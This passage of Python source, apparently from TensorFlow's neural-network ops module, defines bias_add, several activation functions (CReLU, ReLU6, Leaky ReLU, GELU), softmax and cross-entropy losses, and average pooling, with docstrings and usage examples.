@tf_export("nn.bias_add")
@dispatch.add_dispatch_support
def bias_add(value, bias, data_format=None, name=None):
"""Adds `bias` to `value`.
This is (mostly) a special case of `tf.add` where `bias` is restricted to 1-D.
Broadcasting is supported, so `value` may have any number of dimensions.
Unlike `tf.add`, the type of `bias` is allowed to differ from `value` in the
case where both types are quantized.
Args:
value: A `Tensor` with type `float`, `double`, `int64`, `int32`, `uint8`,
`int16`, `int8`, `complex64`, or `complex128`.
bias: A 1-D `Tensor` with size matching the channel dimension of `value`.
Must be the same type as `value` unless `value` is a quantized type,
in which case a different quantized type may be used.
data_format: A string. 'N...C' and 'NC...' are supported. If `None` (the
default) is specified then 'N..C' is assumed.
name: A name for the operation (optional).
Returns:
A `Tensor` with the same type as `value`.
Raises:
ValueError if data format is unrecognized, if `value` has less than two
dimensions when `data_format` is 'N..C'/`None` or `value` has less
then three dimensions when `data_format` is `NC..`, if `bias` does not
have exactly one dimension (is a vector), or if the size of `bias`
does not match the size of the channel dimension of `value`.
"""
with ops.name_scope(name, "BiasAdd", [value, bias]) as name:
if data_format is not None:
if data_format.startswith("NC"):
data_format = "NCHW"
elif data_format.startswith("N") and data_format.endswith("C"):
data_format = "NHWC"
else:
raise ValueError("data_format must be of the form `N...C` or `NC...`")
if not context.executing_eagerly():
value = ops.convert_to_tensor(value, name="input")
bias = ops.convert_to_tensor(bias, dtype=value.dtype, name="bias")
# TODO(duncanriach): Implement deterministic functionality at CUDA kernel
# level.
if _tf_deterministic_ops():
# Note that this code does not implement the same error checks as the
# pre-existing C++ ops.
if data_format == "NCHW":
broadcast_shape_head = [1, array_ops.size(bias)]
broadcast_shape_tail = array_ops.ones(
array_ops.rank(value) - 2, dtype=dtypes.int32)
broadcast_shape = array_ops.concat(
[broadcast_shape_head, broadcast_shape_tail], 0)
return math_ops.add(
value, array_ops.reshape(bias, broadcast_shape), name=name)
else: # data_format == 'NHWC' or data_format == None
return math_ops.add(value, bias, name=name)
else:
return gen_nn_ops.bias_add(
value, bias, data_format=data_format, name=name)
def bias_add_v1(value, bias, name=None):
"""Adds `bias` to `value`.
This is a deprecated version of bias_add and will soon to be removed.
This is (mostly) a special case of `tf.add` where `bias` is restricted to 1-D.
Broadcasting is supported, so `value` may have any number of dimensions.
Unlike `tf.add`, the type of `bias` is allowed to differ from `value` in the
case where both types are quantized.
Args:
value: A `Tensor` with type `float`, `double`, `int64`, `int32`, `uint8`,
`int16`, `int8`, `complex64`, or `complex128`.
bias: A 1-D `Tensor` with size matching the last dimension of `value`.
Must be the same type as `value` unless `value` is a quantized type,
in which case a different quantized type may be used.
name: A name for the operation (optional).
Returns:
A `Tensor` with the same type as `value`.
"""
with ops.name_scope(name, "BiasAddV1", [value, bias]) as name:
value = ops.convert_to_tensor(value, name="input")
bias = ops.convert_to_tensor(bias, dtype=value.dtype, name="bias")
return gen_nn_ops.bias_add_v1(value, bias, name=name)
@tf_export(v1=["nn.crelu"])
@dispatch.add_dispatch_support
def crelu(features, name=None, axis=-1):
"""Computes Concatenated ReLU.
Concatenates a ReLU which selects only the positive part of the activation
with a ReLU which selects only the *negative* part of the activation.
Note that as a result this non-linearity doubles the depth of the activations.
Source: [Understanding and Improving Convolutional Neural Networks via
Concatenated Rectified Linear Units. W. Shang, et
al.](https://arxiv.org/abs/1603.05201)
Args:
features: A `Tensor` with type `float`, `double`, `int32`, `int64`, `uint8`,
`int16`, or `int8`.
name: A name for the operation (optional).
axis: The axis that the output values are concatenated along. Default is -1.
Returns:
A `Tensor` with the same type as `features`.
References:
Understanding and Improving Convolutional Neural Networks via Concatenated
Rectified Linear Units:
[Shang et al., 2016](http://proceedings.mlr.press/v48/shang16)
([pdf](http://proceedings.mlr.press/v48/shang16.pdf))
"""
with ops.name_scope(name, "CRelu", [features]) as name:
features = ops.convert_to_tensor(features, name="features")
c = array_ops.concat([features, -features], axis, name=name) # pylint: disable=invalid-unary-operand-type
return gen_nn_ops.relu(c)
@tf_export("nn.crelu", v1=[])
@dispatch.add_dispatch_support
def crelu_v2(features, axis=-1, name=None):
return crelu(features, name=name, axis=axis)
crelu_v2.__doc__ = crelu.__doc__
@tf_export("nn.relu6")
@dispatch.add_dispatch_support
def relu6(features, name=None):
"""Computes Rectified Linear 6: `min(max(features, 0), 6)`.
Args:
features: A `Tensor` with type `float`, `double`, `int32`, `int64`, `uint8`,
`int16`, or `int8`.
name: A name for the operation (optional).
Returns:
A `Tensor` with the same type as `features`.
References:
Convolutional Deep Belief Networks on CIFAR-10:
Krizhevsky et al., 2010
([pdf](http://www.cs.utoronto.ca/~kriz/conv-cifar10-aug2010.pdf))
"""
with ops.name_scope(name, "Relu6", [features]) as name:
features = ops.convert_to_tensor(features, name="features")
return gen_nn_ops.relu6(features, name=name)
@tf_export("nn.leaky_relu")
@dispatch.add_dispatch_support
def leaky_relu(features, alpha=0.2, name=None):
"""Compute the Leaky ReLU activation function.
Source: [Rectifier Nonlinearities Improve Neural Network Acoustic Models.
AL Maas, AY Hannun, AY Ng - Proc. ICML, 2013]
(https://ai.stanford.edu/~amaas/papers/relu_hybrid_icml2013_final.pdf).
Args:
features: A `Tensor` representing preactivation values. Must be one of
the following types: `float16`, `float32`, `float64`, `int32`, `int64`.
alpha: Slope of the activation function at x < 0.
name: A name for the operation (optional).
Returns:
The activation value.
References:
Rectifier Nonlinearities Improve Neural Network Acoustic Models:
[Maas et al., 2013]
(http://citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.693.1422)
([pdf]
(http://citeseerx.ist.psu.edu/viewdoc/download?doi=10.1.1.693.1422&rep=rep1&type=pdf))
"""
with ops.name_scope(name, "LeakyRelu", [features, alpha]) as name:
features = ops.convert_to_tensor(features, name="features")
if features.dtype.is_integer:
features = math_ops.cast(features, dtypes.float32)
if isinstance(alpha, np.ndarray):
alpha = alpha.item()
return gen_nn_ops.leaky_relu(features, alpha=alpha, name=name)
@tf_export("nn.gelu", v1=[])
@dispatch.add_dispatch_support
def gelu(features, approximate=False, name=None):
"""Compute the Gaussian Error Linear Unit (GELU) activation function.
Gaussian error linear unit (GELU) computes
`x * P(X <= x)`, where `P(X) ~ N(0, 1)`.
The (GELU) nonlinearity weights inputs by their value, rather than gates
inputs by their sign as in ReLU.
For example:
>>> x = tf.constant([-3.0, -1.0, 0.0, 1.0, 3.0], dtype=tf.float32)
>>> y = tf.nn.gelu(x)
>>> y.numpy()
array([-0.00404951, -0.15865529, 0. , 0.8413447 , 2.9959507 ],
dtype=float32)
>>> y = tf.nn.gelu(x, approximate=True)
>>> y.numpy()
array([-0.00363752, -0.15880796, 0. , 0.841192 , 2.9963627 ],
dtype=float32)
Args:
features: A `Tensor` representing preactivation values.
approximate: An optional `bool`. Defaults to `False`. Whether to enable
approximation.
name: A name for the operation (optional).
Returns:
A `Tensor` with the same type as `features`.
References:
[Gaussian Error Linear Units (GELUs)](https://arxiv.org/abs/1606.08415).
"""
with ops.name_scope(name, "Gelu", [features]):
features = ops.convert_to_tensor(features, name="features")
if approximate:
coeff = math_ops.cast(0.044715, features.dtype)
return 0.5 * features * (
1.0 + math_ops.tanh(0.7978845608028654 *
(features + coeff * math_ops.pow(features, 3))))
else:
return 0.5 * features * (1.0 + math_ops.erf(
features / math_ops.cast(1.4142135623730951, features.dtype)))
def _flatten_outer_dims(logits):
"""Flattens logits' outer dimensions and keep its last dimension."""
rank = array_ops.rank(logits)
last_dim_size = array_ops.slice(
array_ops.shape(logits), [math_ops.subtract(rank, 1)], [1])
output = array_ops.reshape(logits, array_ops.concat([[-1], last_dim_size], 0))
# Set output shape if known.
if not context.executing_eagerly():
shape = logits.get_shape()
if shape is not None and shape.dims is not None:
shape = shape.as_list()
product = 1
product_valid = True
for d in shape[:-1]:
if d is None:
product_valid = False
break
else:
product *= d
if product_valid:
output_shape = [product, shape[-1]]
output.set_shape(output_shape)
return output
def _wrap_2d_function(inputs, compute_op, dim=-1, name=None):
"""Helper function for ops that accept and return 2d inputs of same shape.
It reshapes and transposes the inputs into a 2-D Tensor and then invokes
the given function. The output would be transposed and reshaped back.
If the given function returns a tuple of tensors, each of them will be
transposed and reshaped.
Args:
inputs: A non-empty `Tensor`. Must be one of the following types: `half`,
`float32`, `float64`.
compute_op: The function to wrap. Must accept the input tensor as its first
arugment, and a second keyword argument `name`.
dim: The dimension softmax would be performed on. The default is -1 which
indicates the last dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same shape as inputs. If compute_op returns multiple
tensors, each of them have the same shape as the input.
Raises:
InvalidArgumentError: if `inputs` is empty or `dim` is beyond the last
dimension of `inputs`.
"""
def _swap_axis(input_tensor, dim_index, last_index, name=None):
"""Swaps logits's dim_index and last_index."""
return array_ops.transpose(
input_tensor,
array_ops.concat([
math_ops.range(dim_index), [last_index],
math_ops.range(dim_index + 1, last_index), [dim_index]
], 0),
name=name)
inputs = ops.convert_to_tensor(inputs)
# We need its original shape for shape inference.
shape = inputs.get_shape()
is_last_dim = (dim == -1) or (dim == shape.ndims - 1)
if is_last_dim:
return compute_op(inputs, name=name)
dim_val = dim
if isinstance(dim, ops.Tensor):
dim_val = tensor_util.constant_value(dim)
if dim_val is not None and not -shape.ndims <= dim_val < shape.ndims:
raise errors_impl.InvalidArgumentError(
None, None,
"Dimension (%d) must be in the range [%d, %d) where %d is the number of"
" dimensions in the input." % (dim_val, -shape.ndims, shape.ndims,
shape.ndims))
# If dim is not the last dimension, we have to do a transpose so that we can
# still perform the op on its last dimension.
# In case dim is negative (and is not last dimension -1), add shape.ndims
ndims = array_ops.rank(inputs)
if not isinstance(dim, ops.Tensor):
if dim < 0:
dim += ndims
else:
dim = array_ops.where(math_ops.less(dim, 0), dim + ndims, dim)
# Swap logits' dimension of dim and its last dimension.
input_rank = array_ops.rank(inputs)
dim_axis = dim % shape.ndims
inputs = _swap_axis(inputs, dim_axis, math_ops.subtract(input_rank, 1))
# Do the actual call on its last dimension.
def fix_output(output):
output = _swap_axis(
output, dim_axis, math_ops.subtract(input_rank, 1), name=name)
# Make shape inference work since transpose may erase its static shape.
output.set_shape(shape)
return output
outputs = compute_op(inputs)
if isinstance(outputs, tuple):
return tuple(fix_output(output) for output in outputs)
else:
return fix_output(outputs)
@tf_export("nn.softmax", "math.softmax", v1=[])
@dispatch.add_dispatch_support
def softmax_v2(logits, axis=None, name=None):
"""Computes softmax activations.
Used for multi-class predictions. The sum of all outputs generated by softmax
is 1.
This function performs the equivalent of
softmax = tf.exp(logits) / tf.reduce_sum(tf.exp(logits), axis)
Example usage:
>>> softmax = tf.nn.softmax([-1, 0., 1.])
>>> softmax
<tf.Tensor: shape=(3,), dtype=float32,
numpy=array([0.09003057, 0.24472848, 0.66524094], dtype=float32)>
>>> sum(softmax)
<tf.Tensor: shape=(), dtype=float32, numpy=1.0>
Args:
logits: A non-empty `Tensor`. Must be one of the following types: `half`,
`float32`, `float64`.
axis: The dimension softmax would be performed on. The default is -1 which
indicates the last dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type and shape as `logits`.
Raises:
InvalidArgumentError: if `logits` is empty or `axis` is beyond the last
dimension of `logits`.
"""
if axis is None:
axis = -1
return _wrap_2d_function(logits, gen_nn_ops.softmax, axis, name)
@tf_export(v1=["nn.softmax", "math.softmax"])
@dispatch.add_dispatch_support
@deprecation.deprecated_args(None, "dim is deprecated, use axis instead", "dim")
def softmax(logits, axis=None, name=None, dim=None):
axis = deprecation.deprecated_argument_lookup("axis", axis, "dim", dim)
if axis is None:
axis = -1
return _wrap_2d_function(logits, gen_nn_ops.softmax, axis, name)
softmax.__doc__ = softmax_v2.__doc__
@tf_export(v1=["nn.log_softmax", "math.log_softmax"])
@dispatch.add_dispatch_support
@deprecation.deprecated_args(None, "dim is deprecated, use axis instead", "dim")
def log_softmax(logits, axis=None, name=None, dim=None):
"""Computes log softmax activations.
For each batch `i` and class `j` we have
logsoftmax = logits - log(reduce_sum(exp(logits), axis))
Args:
logits: A non-empty `Tensor`. Must be one of the following types: `half`,
`float32`, `float64`.
axis: The dimension softmax would be performed on. The default is -1 which
indicates the last dimension.
name: A name for the operation (optional).
dim: Deprecated alias for `axis`.
Returns:
A `Tensor`. Has the same type as `logits`. Same shape as `logits`.
Raises:
InvalidArgumentError: if `logits` is empty or `axis` is beyond the last
dimension of `logits`.
"""
axis = deprecation.deprecated_argument_lookup("axis", axis, "dim", dim)
if axis is None:
axis = -1
return _wrap_2d_function(logits, gen_nn_ops.log_softmax, axis, name)
@tf_export("nn.log_softmax", "math.log_softmax", v1=[])
@dispatch.add_dispatch_support
def log_softmax_v2(logits, axis=None, name=None):
"""Computes log softmax activations.
For each batch `i` and class `j` we have
logsoftmax = logits - log(reduce_sum(exp(logits), axis))
Args:
logits: A non-empty `Tensor`. Must be one of the following types: `half`,
`float32`, `float64`.
axis: The dimension softmax would be performed on. The default is -1 which
indicates the last dimension.
name: A name for the operation (optional).
Returns:
A `Tensor`. Has the same type as `logits`. Same shape as `logits`.
Raises:
InvalidArgumentError: if `logits` is empty or `axis` is beyond the last
dimension of `logits`.
"""
if axis is None:
axis = -1
return _wrap_2d_function(logits, gen_nn_ops.log_softmax, axis, name)
def _ensure_xent_args(name, sentinel, labels, logits):
# Make sure that all arguments were passed as named arguments.
if sentinel is not None:
raise ValueError("Only call `%s` with "
"named arguments (labels=..., logits=..., ...)" % name)
if labels is None or logits is None:
raise ValueError("Both labels and logits must be provided.")
@tf_export("nn.softmax_cross_entropy_with_logits", v1=[])
@dispatch.add_dispatch_support
def softmax_cross_entropy_with_logits_v2(labels, logits, axis=-1, name=None):
"""Computes softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
**NOTE:** While the classes are mutually exclusive, their probabilities
need not be. All that is required is that each row of `labels` is
a valid probability distribution. If they are not, the computation of the
gradient will be incorrect.
If using exclusive `labels` (wherein one and only
one class is true at a time), see `sparse_softmax_cross_entropy_with_logits`.
Usage:
>>> logits = [[4.0, 2.0, 1.0], [0.0, 5.0, 1.0]]
>>> labels = [[1.0, 0.0, 0.0], [0.0, 0.8, 0.2]]
>>> tf.nn.softmax_cross_entropy_with_logits(labels=labels, logits=logits)
<tf.Tensor: shape=(2,), dtype=float32,
numpy=array([0.16984604, 0.82474494], dtype=float32)>
**WARNING:** This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits and labels of shape
`[batch_size, num_classes]`, but higher dimensions are supported, with
the `axis` argument specifying the class dimension.
`logits` and `labels` must have the same dtype (either `float16`, `float32`,
or `float64`).
Backpropagation will happen into both `logits` and `labels`. To disallow
backpropagation into `labels`, pass label tensors through `tf.stop_gradient`
before feeding it to this function.
**Note that to avoid confusion, it is required to pass only named arguments to
this function.**
Args:
labels: Each vector along the class dimension should hold a valid
probability distribution e.g. for the case in which labels are of shape
`[batch_size, num_classes]`, each row of `labels[i]` must be a valid
probability distribution.
logits: Per-label activations, typically a linear output. These activation
energies are interpreted as unnormalized log probabilities.
axis: The class dimension. Defaulted to -1 which is the last dimension.
name: A name for the operation (optional).
Returns:
A `Tensor` that contains the softmax cross entropy loss. Its type is the
same as `logits` and its shape is the same as `labels` except that it does
not have the last dimension of `labels`.
"""
return softmax_cross_entropy_with_logits_v2_helper(
labels=labels, logits=logits, axis=axis, name=name)
@tf_export(v1=["nn.softmax_cross_entropy_with_logits_v2"])
@dispatch.add_dispatch_support
@deprecated_args(None, "dim is deprecated, use axis instead", "dim")
def softmax_cross_entropy_with_logits_v2_helper(
labels, logits, axis=None, name=None, dim=None):
"""Computes softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
**NOTE:** While the classes are mutually exclusive, their probabilities
need not be. All that is required is that each row of `labels` is
a valid probability distribution. If they are not, the computation of the
gradient will be incorrect.
If using exclusive `labels` (wherein one and only
one class is true at a time), see `sparse_softmax_cross_entropy_with_logits`.
**WARNING:** This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits and labels of shape
`[batch_size, num_classes]`, but higher dimensions are supported, with
the `axis` argument specifying the class dimension.
`logits` and `labels` must have the same dtype (either `float16`, `float32`,
or `float64`).
Backpropagation will happen into both `logits` and `labels`. To disallow
backpropagation into `labels`, pass label tensors through `tf.stop_gradient`
before feeding it to this function.
**Note that to avoid confusion, it is required to pass only named arguments to
this function.**
Args:
labels: Each vector along the class dimension should hold a valid
probability distribution e.g. for the case in which labels are of shape
`[batch_size, num_classes]`, each row of `labels[i]` must be a valid
probability distribution.
logits: Unscaled log probabilities.
axis: The class dimension. Defaulted to -1 which is the last dimension.
name: A name for the operation (optional).
dim: Deprecated alias for axis.
Returns:
A `Tensor` that contains the softmax cross entropy loss. Its type is the
same as `logits` and its shape is the same as `labels` except that it does
not have the last dimension of `labels`.
"""
# TODO(pcmurray) Raise an error when the labels do not sum to 1. Note: This
# could break users who call this with bad labels, but disregard the bad
# results.
axis = deprecated_argument_lookup("axis", axis, "dim", dim)
del dim
if axis is None:
axis = -1
with ops.name_scope(name, "softmax_cross_entropy_with_logits",
[logits, labels]) as name:
logits = ops.convert_to_tensor(logits, name="logits")
labels = ops.convert_to_tensor(labels, name="labels")
convert_to_float32 = (
logits.dtype == dtypes.float16 or logits.dtype == dtypes.bfloat16)
precise_logits = math_ops.cast(
logits, dtypes.float32) if convert_to_float32 else logits
# labels and logits must be of the same type
labels = math_ops.cast(labels, precise_logits.dtype)
input_rank = array_ops.rank(precise_logits)
# For shape inference.
shape = logits.get_shape()
# Move the dim to the end if dim is not the last dimension.
if axis != -1:
def _move_dim_to_end(tensor, dim_index, rank):
return array_ops.transpose(
tensor,
array_ops.concat([
math_ops.range(dim_index),
math_ops.range(dim_index + 1, rank), [dim_index]
], 0))
precise_logits = _move_dim_to_end(precise_logits, axis, input_rank)
labels = _move_dim_to_end(labels, axis, input_rank)
input_shape = array_ops.shape(precise_logits)
# Make precise_logits and labels into matrices.
precise_logits = _flatten_outer_dims(precise_logits)
labels = _flatten_outer_dims(labels)
# Do the actual op computation.
if _tf_deterministic_ops():
log_probs = log_softmax_v2(precise_logits)
cost = -math_ops.reduce_sum(labels * log_probs, axis=1)
else:
# The second output tensor contains the gradients. We use it in
# CrossEntropyGrad() in nn_grad but not here.
cost, unused_backprop = gen_nn_ops.softmax_cross_entropy_with_logits(
precise_logits, labels, name=name)
# The output cost shape should be the input minus axis.
output_shape = array_ops.slice(input_shape, [0],
[math_ops.subtract(input_rank, 1)])
cost = array_ops.reshape(cost, output_shape)
# Make shape inference work since reshape and transpose may erase its static
# shape.
if not context.executing_eagerly(
) and shape is not None and shape.dims is not None:
shape = shape.as_list()
del shape[axis]
cost.set_shape(shape)
if convert_to_float32:
return math_ops.cast(cost, logits.dtype)
else:
return cost
_XENT_DEPRECATION = """
Future major versions of TensorFlow will allow gradients to flow
into the labels input on backprop by default.
See `tf.nn.softmax_cross_entropy_with_logits_v2`.
"""
@tf_export(v1=["nn.softmax_cross_entropy_with_logits"])
@dispatch.add_dispatch_support
@deprecation.deprecated(date=None, instructions=_XENT_DEPRECATION)
def softmax_cross_entropy_with_logits(
_sentinel=None, # pylint: disable=invalid-name
labels=None,
logits=None,
dim=-1,
name=None,
axis=None):
"""Computes softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
**NOTE:** While the classes are mutually exclusive, their probabilities
need not be. All that is required is that each row of `labels` is
a valid probability distribution. If they are not, the computation of the
gradient will be incorrect.
If using exclusive `labels` (wherein one and only
one class is true at a time), see `sparse_softmax_cross_entropy_with_logits`.
**WARNING:** This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits and labels of shape
`[batch_size, num_classes]`, but higher dimensions are supported, with
the `dim` argument specifying the class dimension.
Backpropagation will happen only into `logits`. To calculate a cross entropy
loss that allows backpropagation into both `logits` and `labels`, see
`tf.nn.softmax_cross_entropy_with_logits_v2`.
**Note that to avoid confusion, it is required to pass only named arguments to
this function.**
Args:
_sentinel: Used to prevent positional parameters. Internal, do not use.
labels: Each vector along the class dimension should hold a valid
probability distribution e.g. for the case in which labels are of shape
`[batch_size, num_classes]`, each row of `labels[i]` must be a valid
probability distribution.
logits: Per-label activations, typically a linear output. These activation
energies are interpreted as unnormalized log probabilities.
dim: The class dimension. Defaulted to -1 which is the last dimension.
name: A name for the operation (optional).
axis: Alias for dim.
Returns:
A `Tensor` that contains the softmax cross entropy loss. Its type is the
same as `logits` and its shape is the same as `labels` except that it does
not have the last dimension of `labels`.
"""
dim = deprecated_argument_lookup("axis", axis, "dim", dim)
_ensure_xent_args("softmax_cross_entropy_with_logits", _sentinel, labels,
logits)
with ops.name_scope(name, "softmax_cross_entropy_with_logits_sg",
[logits, labels]) as name:
labels = array_ops.stop_gradient(labels, name="labels_stop_gradient")
return softmax_cross_entropy_with_logits_v2(
labels=labels, logits=logits, axis=dim, name=name)
@tf_export(v1=["nn.sparse_softmax_cross_entropy_with_logits"])
@dispatch.add_dispatch_support
def sparse_softmax_cross_entropy_with_logits(
_sentinel=None, # pylint: disable=invalid-name
labels=None,
logits=None,
name=None):
"""Computes sparse softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
**NOTE:** For this operation, the probability of a given label is considered
exclusive. That is, soft classes are not allowed, and the `labels` vector
must provide a single specific index for the true class for each row of
`logits` (each minibatch entry). For soft softmax classification with
a probability distribution for each entry, see
`softmax_cross_entropy_with_logits_v2`.
**WARNING:** This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits of shape
`[batch_size, num_classes]` and have labels of shape
`[batch_size]`, but higher dimensions are supported, in which
case the `dim`-th dimension is assumed to be of size `num_classes`.
`logits` must have the dtype of `float16`, `float32`, or `float64`, and
`labels` must have the dtype of `int32` or `int64`.
**Note that to avoid confusion, it is required to pass only named arguments to
this function.**
Args:
_sentinel: Used to prevent positional parameters. Internal, do not use.
labels: `Tensor` of shape `[d_0, d_1, ..., d_{r-1}]` (where `r` is rank of
`labels` and result) and dtype `int32` or `int64`. Each entry in `labels`
must be an index in `[0, num_classes)`. Other values will raise an
exception when this op is run on CPU, and return `NaN` for corresponding
loss and gradient rows on GPU.
logits: Per-label activations (typically a linear output) of shape
`[d_0, d_1, ..., d_{r-1}, num_classes]` and dtype `float16`, `float32`, or
`float64`. These activation energies are interpreted as unnormalized log
probabilities.
name: A name for the operation (optional).
Returns:
A `Tensor` of the same shape as `labels` and of the same type as `logits`
with the softmax cross entropy loss.
Raises:
ValueError: If logits are scalars (need to have rank >= 1) or if the rank
of the labels is not equal to the rank of the logits minus one.
"""
_ensure_xent_args("sparse_softmax_cross_entropy_with_logits", _sentinel,
labels, logits)
# TODO(pcmurray) Raise an error when the label is not an index in
# [0, num_classes). Note: This could break users who call this with bad
# labels, but disregard the bad results.
# Reshape logits and labels to rank 2.
with ops.name_scope(name, "SparseSoftmaxCrossEntropyWithLogits",
[labels, logits]):
labels = ops.convert_to_tensor(labels)
logits = ops.convert_to_tensor(logits)
precise_logits = math_ops.cast(logits, dtypes.float32) if (dtypes.as_dtype(
logits.dtype) == dtypes.float16) else logits
# Store label shape for result later.
labels_static_shape = labels.get_shape()
labels_shape = array_ops.shape(labels)
static_shapes_fully_defined = (
labels_static_shape.is_fully_defined() and
logits.get_shape()[:-1].is_fully_defined())
if logits.get_shape().ndims is not None and logits.get_shape().ndims == 0:
raise ValueError(
"Logits cannot be scalars - received shape %s." % logits.get_shape())
if logits.get_shape().ndims is not None and (
labels_static_shape.ndims is not None and
labels_static_shape.ndims != logits.get_shape().ndims - 1):
raise ValueError("Rank mismatch: Rank of labels (received %s) should "
"equal rank of logits minus 1 (received %s)." %
(labels_static_shape.ndims, logits.get_shape().ndims))
if (static_shapes_fully_defined and
labels_static_shape != logits.get_shape()[:-1]):
raise ValueError("Shape mismatch: The shape of labels (received %s) "
"should equal the shape of logits except for the last "
"dimension (received %s)." % (labels_static_shape,
logits.get_shape()))
# Check if no reshapes are required.
if logits.get_shape().ndims == 2:
cost, _ = gen_nn_ops.sparse_softmax_cross_entropy_with_logits(
precise_logits, labels, name=name)
if logits.dtype == dtypes.float16:
return math_ops.cast(cost, dtypes.float16)
else:
return cost
# Perform a check of the dynamic shapes if the static shapes are not fully
# defined.
shape_checks = []
if not static_shapes_fully_defined:
shape_checks.append(
check_ops.assert_equal(
array_ops.shape(labels),
array_ops.shape(logits)[:-1]))
with ops.control_dependencies(shape_checks):
# Reshape logits to 2 dim, labels to 1 dim.
num_classes = array_ops.shape(logits)[array_ops.rank(logits) - 1]
precise_logits = array_ops.reshape(precise_logits, [-1, num_classes])
labels = array_ops.reshape(labels, [-1])
# The second output tensor contains the gradients. We use it in
# _CrossEntropyGrad() in nn_grad but not here.
cost, _ = gen_nn_ops.sparse_softmax_cross_entropy_with_logits(
precise_logits, labels, name=name)
cost = array_ops.reshape(cost, labels_shape)
cost.set_shape(labels_static_shape)
if logits.dtype == dtypes.float16:
return math_ops.cast(cost, dtypes.float16)
else:
return cost
@tf_export("nn.sparse_softmax_cross_entropy_with_logits", v1=[])
@dispatch.add_dispatch_support
def sparse_softmax_cross_entropy_with_logits_v2(labels, logits, name=None):
"""Computes sparse softmax cross entropy between `logits` and `labels`.
Measures the probability error in discrete classification tasks in which the
classes are mutually exclusive (each entry is in exactly one class). For
example, each CIFAR-10 image is labeled with one and only one label: an image
can be a dog or a truck, but not both.
Note: For this operation, the probability of a given label is considered
exclusive. That is, soft classes are not allowed, and the `labels` vector
must provide a single specific index for the true class for each row of
`logits` (each minibatch entry). For soft softmax classification with
a probability distribution for each entry, see
`softmax_cross_entropy_with_logits_v2`.
Warning: This op expects unscaled logits, since it performs a `softmax`
on `logits` internally for efficiency. Do not call this op with the
output of `softmax`, as it will produce incorrect results.
A common use case is to have logits of shape
`[batch_size, num_classes]` and have labels of shape
`[batch_size]`, but higher dimensions are supported, in which
case the `dim`-th dimension is assumed to be of size `num_classes`.
`logits` must have the dtype of `float16`, `float32`, or `float64`, and
`labels` must have the dtype of `int32` or `int64`.
>>> logits = tf.constant([[2., -5., .5, -.1],
... [0., 0., 1.9, 1.4],
... [-100., 100., -100., -100.]])
>>> labels = tf.constant([0, 3, 1])
>>> tf.nn.sparse_softmax_cross_entropy_with_logits(
... labels=labels, logits=logits).numpy()
array([0.29750752, 1.1448325 , 0. ], dtype=float32)
To avoid confusion, passing only named arguments to this function is
recommended.
Args:
labels: `Tensor` of shape `[d_0, d_1, ..., d_{r-1}]` (where `r` is rank of
`labels` and result) and dtype `int32` or `int64`. Each entry in `labels`
must be an index in `[0, num_classes)`. Other values will raise an
exception when this op is run on CPU, and return `NaN` for corresponding
loss and gradient rows on GPU.
logits: Unscaled log probabilities of shape `[d_0, d_1, ..., d_{r-1},
num_classes]` and dtype `float16`, `float32`, or `float64`.
name: A name for the operation (optional).
Returns:
A `Tensor` of the same shape as `labels` and of the same type as `logits`
with the softmax cross entropy loss.
Raises:
ValueError: If logits are scalars (need to have rank >= 1) or if the rank
of the labels is not equal to the rank of the logits minus one.
"""
return sparse_softmax_cross_entropy_with_logits(
labels=labels, logits=logits, name=name)
@tf_export("nn.avg_pool", v1=["nn.avg_pool_v2"])
@dispatch.add_dispatch_support
def avg_pool_v2(input, ksize, strides, padding, data_format=None, name=None): # pylint: disable=redefined-builtin
"""Performs the avg pooling on the input.
Each entry in `output` is the mean of the corresponding size `ksize`
window in `value`.
Args:
input: Tensor of rank N+2, of shape `[batch_size] + input_spatial_shape +
[num_channels]` if `data_format` does not start with "NC" (default), or
`[batch_size, num_channels] + input_spatial_shape` if data_format starts
with "NC". Pooling happens over the spatial dimensions only.
ksize: An int or list of `ints` that has length `1`, `N` or `N+2`. The size
of the window for each dimension of the input tensor.
strides: An int or list of `ints` that has length `1`, `N` or `N+2`. The
stride of the sliding window for each dimension of the input tensor.
padding: A string, either `'VALID'` or `'SAME'`. The padding algorithm. See
the "returns" section of `tf.nn.convolution` for details.
data_format: A string. Specifies the channel dimension. For N=1 it can be
either "NWC" (default) or "NCW", for N=2 it can be either "NHWC" (default)
or "NCHW" and for N=3 either "NDHWC" (default) or "NCDHW".
name: Optional name for the operation.
Returns:
A `Tensor` of format specified by `data_format`.
The average pooled output tensor.
"""
if input.shape is not None:
n = len(input.shape) - 2
elif data_format is not None:
n = len(data_format) - 2
else:
raise ValueError(
"The input must have a rank or a data format must be given.")
if not 1 <= n <= 3:
raise ValueError(
"Input tensor must be of rank 3, 4 or 5 but was {}.".format(n + 2))
if data_format is None:
channel_index = n + 1
else:
channel_index = 1 if data_format.startswith("NC") else n + 1
ksize = _get_sequence(ksize, n, channel_index, "ksize")
strides = _get_sequence(strides, n, channel_index, "strides")
avg_pooling_ops = {
1: avg_pool1d,
2: gen_nn_ops.avg_pool,
3: gen_nn_ops.avg_pool3d
}
op = avg_pooling_ops[n]
return op(
input,
ksize=ksize,
strides=strides,
padding=padding,
data_format=data_format,
name=name)
